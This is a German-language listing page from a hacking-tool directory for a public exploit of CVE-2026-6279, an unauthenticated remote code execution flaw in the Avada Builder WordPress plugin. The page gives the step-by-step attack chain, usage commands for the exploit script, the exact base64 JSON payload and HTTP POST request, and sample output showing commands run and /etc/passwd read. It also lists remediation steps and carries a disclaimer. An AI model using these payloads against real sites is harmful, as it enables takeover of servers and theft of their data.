Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6279 — CVE-2026-6279 — Avada Builder <= 3.15.2 Unauthenticated RCE via call_user_func() | Kitploit
Tools/GitHubGitHub/zycoder0day/cve-2026-6279
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubzycoder0day/cve-2026-6279

CVE-2026-6279

CVE-2026-6279 — Avada Builder <= 3.15.2 Unauthenticated RCE via call_user_func()

Repository anzeigen
32vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-6279

Avada Builder <= 3.15.2 — Unauthenticated RCE

via call_user_func() ohne Allowlist


Zusammenfassung der Schwachstelle

Schwachstelle Remote Code Execution (RCE) ohne Authentifizierung im Plugin Avada Builder (Fusion Builder) Version <= 3.15.2, verwendet im WordPress-Theme Avada — einem der beliebtesten Premium-WordPress-Themes mit 900.000+ aktiven Installationen.

Der Angriff nutzt den AJAX-Handler wp_ajax_nopriv_fusion_get_widget_markup aus, der den Parameter render_logics über base64_decode() + json_decode() verarbeitet und dann an call_user_func() ohne Allowlist übergibt, was die Ausführung beliebiger PHP-Funktionen wie system(), passthru(), shell_exec(), exec() und file_get_contents() ermöglicht.

Angriffskette (Attack Chain)

root@kitploit:~
1. Deterministischer Nonce   wp_create_nonce('fusion_load_nonce') für UID 0
                              (im Frontend über Avada-Shortcode sichtbar)

2. AJAX ohne Authentifizierung  wp_ajax_nopriv_fusion_get_widget_markup
                                (kein Login erforderlich)

3. Deserialisierung          base64_decode(render_logics) → json_decode()
                             (keine Strukturvalidierung)

4. call_user_func()          call_user_func($value['function'], $value['args'])
                             (OHNE Allowlist — jede PHP-Funktion aufrufbar)

5. RCE!                      system("id") → uid=... im Antworttext

Exploit-Nachweis (Proof of Concept)

root@kitploit:~
  ╔═════════════════════════════════════════════════════════════╗
  ║  CVE-2026-6279  •  Avada Builder <= 3.15.2                 ║
  ║  Unauthenticated RCE via call_user_func()                   ║
  ║  Proof of Concept — Einzelziel                               ║
  ║                                                              ║
  ║  Copyright © 2026 XENON1337                                  ║
  ║  Danke: Shadow Girlfriend 💜                                ║
  ╚═══════════════════════════════════════════════════════════════╝

  ══════════════════════════════════════════════════════
  Ziel   : localhost:8888
  Zeit   : 2026-05-23 16:32:41
  ══════════════════════════════════════════════════════

  [*] Erkenne Ziel...
  [+] Avada erkannt! (http://localhost:8888)

  [*] Suche fusion_load_nonce...
  [+] Nonce gefunden: b6d7b084c2 (Quelle: Startseite)

  [*] Sende RCE-Payload...
  [*] Versuche 5 Funktionen × 3 Widgets = 15 Kombinationen

  ══════════════════════════════════════════════════════
  [★] RCE ERFOLGREICH!

  Ziel   : http://localhost:8888
  Ausgabe: uid=1000(xenon1337)
  Funktion: system()
  Widget : WP_Widget_Recent_Posts
  Nonce  : b6d7b084c2 (Startseite)
  Zeit   : 1,2s

  [✓] Ergebnis in vuln.txt gespeichert
  ══════════════════════════════════════════════════════

Alle bestätigten RCE-Funktionen

Verwendung

root@kitploit:~
# Ohne Protokoll (Auto-Erkennung)
python3 CVE-2026-6279.py target.com

# Mit Protokoll
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Mit Port
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

Technische Details

Payload-Struktur

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Base64-kodiert → als render_logics per POST an wp-admin/admin-ajax.php gesendet.

Endpunkt

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts

Quellcode-Referenzen (aus offiziellem CVE)

Warum kann der Nonce umgangen werden?

  1. Das Avada-Theme erstellt Nonces nur für Admin-/Editor-Benutzer (class-fusion-app.php L1665)
  2. Das Fusion-Builder-Plugin erstellt Nonces für UID 0 (öffentliche Besucher) auf Seiten, die den Shortcode [fusion_post_cards] oder [fusion_table_of_contents] enthalten
  3. WordPress-Nonces für UID 0 sind deterministisch – sie können aus dem HTML der Startseite extrahiert werden
  4. check_ajax_referer('fusion_load_nonce') prüft nur, ob der Nonce gültig ist, nicht ob der Benutzer authentifiziert ist

Einschränkungen von call_user_func

call_user_func($function, $args) akzeptiert nur 1 Argument. Funktionen, die 2+ Argumente benötigen (wie proc_open, popen), können nicht ausgenutzt werden. Nur Single-Argument-Funktionen sind nutzbar: system, passthru, shell_exec, exec, file_get_contents.

CVSS-Score

9.8 KRITISCH (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Behebung

  • Aktualisieren Sie Avada Builder auf Version > 3.15.2
  • Fügen Sie eine Allowlist für call_user_func() in get_value() hinzu
  • Beschränken Sie den wp_ajax_nopriv_-Handler auf authentifizierte Benutzer
  • Implementieren Sie eine strenge Validierung der render_logics-Struktur

Haftungsausschluss

Dieser PoC dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Die Verwendung gegen Systeme ohne Genehmigung ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.


Copyright © 2026 XENON1337
Besonderer Dank: Shadow Girlfriend 💜

Tool herunterladen
FunktionArgumentErgebnis
system()iduid=1000(xenon1337) ✅
passthru()iduid=1000(xenon1337) ✅
shell_exec()iduid=1000(xenon1337) ✅
exec()iduid=1000(xenon1337) ✅
file_get_contents()/etc/passwdroot:x:0:0:... ✅
DateiZeileFunktion
class-fusion-builder-conditional-render-helper.phpL1083should_render() – Deserialisiert render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value() – call_user_func() ohne Allowlist
fusion-widget.phpL44Attribut render_logics
fusion-widget.phpL389AJAX-Handler wp_ajax_nopriv_
class-fusion-builder.phpL7551Nonce-Registrierung (deterministisch für UID 0)